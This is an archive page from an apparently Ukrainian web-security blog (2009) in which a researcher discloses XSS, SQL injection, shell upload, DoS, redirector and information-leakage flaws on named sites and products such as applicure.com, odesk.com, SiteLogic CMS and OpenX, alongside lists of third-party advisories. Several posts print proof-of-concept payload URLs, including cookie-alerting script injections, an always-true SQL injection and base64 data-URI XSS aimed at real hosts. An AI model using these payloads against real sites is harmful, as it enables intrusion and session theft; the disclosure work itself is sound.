Архів для категорії 'Уразливості'

Уразливість на moemesto.ru

23:56 14.10.2009

У лютому, 16.02.2009, я знайшов Cross-Site Scripting уразливість на проекті http://moemesto.ru (це сервіс онлайн закладок). Про що найближчим часом сповіщу адміністрацію проекту.

XSS:

Добірка уразливостей

16:11 13.10.2009

В даній добірці уразливості в веб додатках:

  • Symantec Altiris Deployment Solution SQL Injection Vulnerability (деталі)
  • Symantec Altiris Deployment Solution Domain Credential Disclosure Vulnerability (деталі)
  • php-nuke 8.0 module sections artid blind sql inj vuln (деталі)
  • Megacubo 5.0.7 (mega://) remote eval() injection exploit (деталі)
  • BitDefender Internet Security XSS (деталі)
  • SolucionWeb (main.php?id_area) Remote SQL injection Vulnerability (деталі)
  • PollPro 3.0 XSRF VuLn (деталі)
  • Plunet BusinessManager failure in access controls and multiple stored cross site scripting (деталі)
  • PHP-Fusion Mod vArcade 1.8 Sql Injection Vulnerability (деталі)
  • PHP-Fusion Mod E-Cart Sql Injection (деталі)

Уразливості на www.applicure.com

20:25 12.10.2009

17.06.2009

У квітні, 10.04.2008, я знайшов Insufficient Anti-automation, Cross-Site Scripting та SQL Injection уразливості, а 13.06.2009 ще Information Leakage уразливість на http://www.applicure.com - сайті секюріті компанії Applicure, виробника WAF DotDefender. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

12.10.2009

Insufficient Anti-automation:

http://www.applicure.com/?page=monitorRegister

У формі був відсутній захист від автоматизованих запитів (капча).

XSS:

http://www.applicure.com/unMail.php?e=%3Cscript%3Ealert(document.cookie)%3C/script%3E

SQL Injection:

http://www.applicure.com/unMail.php?e=’%20or%201=’1

Information Leakage:

http://www.applicure.com/CHANGELOG.txt

Попередні уразливості були виправлені шляхом заміни движка на Drupal. А остання уразливість так досі й не була виправлена.

Нові уразливості в CMS SiteLogic

23:54 10.10.2009

У січні, 16.01.2009, я знайшов Cross-Site Scripting уразливість, а 06.04.2009 ще Command Execution уразливість в CMS SiteLogic. Це українська комерційна CMS. Уразливості виявив на одному сайті, що використовує даний движок. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в CMS SiteLogic.

XSS:

http://site/?mid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Command Execution:

Можливе завантаження довільних файлів (shell upload) через модуль “Банерна система” в адмінці.

Добірка уразливостей

16:14 10.10.2009

В даній добірці уразливості в веб додатках:

  • Computer Associates Alert Notification Service Multiple RPC Buffer Overflow Vulnerabilities (деталі)
  • CA ARCserve Backup for Laptops and Desktops Server and CA Desktop Management Suite Multiple Vulnerabilities (деталі)
  • Madrese-Portal Sql Injection (деталі)
  • ViArt Shopping Cart v3.5 Multiple Remote Vulnerabilities (деталі)
  • Joomla Component mdigg 2.2.8 Blind SQL Injection Exploit (деталі)
  • New phppgadmin packages fix several vulnerabilities (деталі)
  • PsychoStats v3.1 XSS (деталі)
  • Multiple directory traversal vulnerabilities in AIST NetCat (деталі)
  • Altiris Deployment Solution - SQL Injection (деталі)
  • Altiris Deployment Solution - Domain Account Disclosure (деталі)

Добірка уразливостей

16:23 08.10.2009

В даній добірці уразливості в веб додатках:

Нові уразливості на www.odesk.com

20:11 07.10.2009

16.07.2009

У листопаді, 11.11.2008, я знайшов Cross-Site Scripting, Insufficient Anti-automation та Abuse of Functionality уразливості на проекті http://www.odesk.com. Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на www.odesk.com.

Детальна інформація про уразливості з’явиться пізніше.

07.10.2009

XSS (IE):

POST запит на сторінці https://www.odesk.com/ticket.php

" style="xss:expression(alert(document.cookie))"В полях: Name, oDesk Username, Email.

Insufficient Anti-automation:

https://www.odesk.com/ticket.php

https://www.odesk.com/ticket.php?key=~~1472bcfe1c8803e1

На даних формах немає захисту від автоматизованих запитів (капчі).

Abuse of Functionality:

https://www.odesk.com/ticket.php

https://www.odesk.com/ticket.php?key=~~1472bcfe1c8803e1

Враховуючи те, що з даних форм емайл відправляється також на заданий емайл користувача, то окрім розсилання спаму власникам сайта, також можна розсилати спам на довільні емайли.

Дані уразливості досі не виправлені.

Добірка уразливостей

16:21 06.10.2009

В даній добірці уразливості в веб додатках:

  • CiscoWorks Common Services Arbitrary Code Execution Vulnerability (деталі)
  • Fresta, CelerBB 0.0.2 Multiple Vulnerabilities (деталі)
  • IBM Lotus Sametime Community Services Multiplexer Stack Overflow Vulnerability (деталі)
  • EasySiteNetwork (joke.php?id) Remote SQL injection Vulnerability (деталі)
  • LittleCMS vulnerability (деталі)
  • Joomla: Session hijacking vulnerability, CVE-2008-4122 (деталі)
  • Численні уразливості в Phpclanwebsite <= 1.23.3 Fix Pack #5 (деталі)
  • Oracle E-Business Suite Business Intelligence SQL Injection Vulnerability (деталі)
  • Nagios vulnerability (деталі)
  • POC for CVE-2008-5619 (roundcubemail PHP arbitrary code injection) (деталі)

Уразливість на webfile.ru

23:56 03.10.2009

У лютому, 08.02.2009, я знайшов Cross-Site Scripting уразливість на сайті http://webfile.ru (файлообмінник). Про що найближчим часом сповіщу адміністрацію сайта.

XSS:

Нові уразливості в OpenX

20:06 03.10.2009

01.08.2009

У червні, 04.06.2009, я знайшов Denial of Service, Cross-Site Scripting та Redirector уразливості в OpenX (дану Redirector уразливість я зустрічав на сайтах ще в 2008 році). Це популярна локальна банерна система, що раніше називалася Openads. Про що найближчим часом повідомлю розробникам системи.

Раніше я вже писав про уразливості в OpenX.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатка.

03.10.2009

DoS (Looped DoS):

http://site/adclick.php

Уразливі вірогідно лише всі версії Openads.

XSS:

http://site/adclick.php?maxdest=javascript:alert(document.cookie)
http://site/adclick.php?dest=javascript:alert(document.cookie)

Працює в Mozilla, Firefox (до версії 3.0.9), IE6, Opera та Google Chrome. Уразливі вірогідно лише всі версії Openads, де використовується заголовок Refresh. В нових версіях (таких як OpenX v2.6.3) використовується заголовок Location і там можлива атака в браузерах Firefox та Opera.

http://site/adclick.php?dest=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2b

Інший редиректор, про який я вже писав, також уразливий для цієї атаки:

http://site/www/delivery/ck.php?dest=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2b

Redirector:

http://site/adclick.php?maxdest=http://websecurity.com.ua
http://site/adclick.php?dest=http://websecurity.com.ua

Уразливі OpenX v2.6.3 та попередні версії та потенційно наступні версії (та всі версії Openads). А до Redirector уразливі всі версії системи - OpenX v2.8.1 та попередні версії.